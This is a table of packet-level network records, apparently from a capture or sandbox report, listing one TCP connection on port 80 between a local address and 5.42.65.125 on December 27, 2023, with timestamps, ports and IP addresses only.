Dec 27, 2023 18:12:24.483740091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.484479904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.484492064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.484524012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.484528065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.484570980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.484575033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.484584093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.484616041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.485282898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.485295057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.485331059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.485342979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.485356092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.485368013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.485384941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.485413074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.486124992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.486138105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.486149073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.486160040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.486171007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.486171007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.486198902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.486226082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.486963034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487010002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.487025023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487037897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487049103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487061024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487071037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.487097025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.487797976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487809896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487843990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.487864971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487876892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487888098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.487915039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.487925053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489301920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489334106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489346027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489347935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489367962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489376068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489381075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489408970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489428997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489703894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489717007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489753008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489804029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489816904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489828110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.489846945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.489872932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494700909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494713068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494724035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494736910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494740963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494748116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494770050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494784117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494792938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494796991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494808912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494821072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494827986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494832039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.494846106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.494869947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.495341063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.495358944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.495373964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.495388031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.495389938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.495400906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.495424986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.495445967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.496661901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496675014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496685982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496697903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496711016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496714115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.496728897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.496747971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.496946096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.496989012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.497118950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497132063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497143984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497155905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497164965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.497199059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.497889042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497903109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497914076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497925043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497930050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.497936964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.497958899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.497987986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.498744965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.498756886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.498768091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.498780012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.498791933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.498791933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.498814106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.498835087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502435923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502449036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502460003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502470970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502491951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502492905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502505064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502528906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502545118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502568960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502579927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502593040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502604961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502610922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502616882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502630949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502659082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.502681017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502693892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.502727032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.503010035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503021955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503058910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.503089905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503102064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503113031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503134966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.503134966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.503153086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.503185987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.504301071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504343033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504343033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.504355907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504379034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504383087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.504391909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504401922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.504420996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.504441023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.504482985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.505768061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.505779982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.505786896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.505794048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.505837917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.510147095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510193110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.510196924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510209084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510220051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510238886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.510261059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.510831118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510848999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.510873079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.510900974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.511112928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511123896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511158943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.511178970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511192083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511204004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511215925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.511223078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.511250019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512375116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512418032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512423992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512435913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512448072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512465000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512485981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512845993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512859106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512892962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512938976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.512980938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.512993097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.513036966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.513649940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.513662100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.513696909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.514348030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.514359951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.514389992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.515563011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.515575886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.515614986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.516211987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.516223907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.516252041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.516279936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.516627073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.516638994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.516680002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.517788887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.517802000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.517832041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.517860889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.518973112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.519005060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.519052029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.519274950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.519287109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.519315958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.519342899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.520493031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.520529985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.520575047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.522799969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.522811890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.522866964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.525526047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525537968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525589943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.525636911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525649071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525660038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525671959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525687933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.525707960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525715113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.525721073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.525749922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.525778055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.529764891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.529778004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.529808998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.529829979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.529830933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.529869080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.531511068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531523943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531589985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.531606913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531625032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531646967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531647921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.531660080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.531681061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.531701088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.533555984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.533567905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.533595085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.533607006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.533618927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.533627033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.533648968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.533667088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.541512966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541524887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541567087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541579008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541583061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.541591883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541614056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.541616917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.541646004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.541678905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549036980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549050093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549061060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549072027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549082041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549093008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549102068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549104929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549118042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549128056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549139023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549160004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549161911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549170971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549180984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549181938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549201965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549212933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549218893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549223900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549236059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549246073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549248934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549257994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549271107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549278021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549282074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549304962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549328089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549731970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549772978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549810886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549823999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549834967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549846888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549860001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.549866915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.549905062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.550367117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.550399065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.550410032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.550436020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560226917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560271978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560272932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560302019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560313940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560314894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560328007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560339928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560358047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560391903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560422897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560436010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560446024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560458899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560470104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.560478926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560507059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.560517073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562406063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562450886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.562510967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562527895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562539101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.562551022 CET	80	49738	5.42.65.125	192.168.2.4
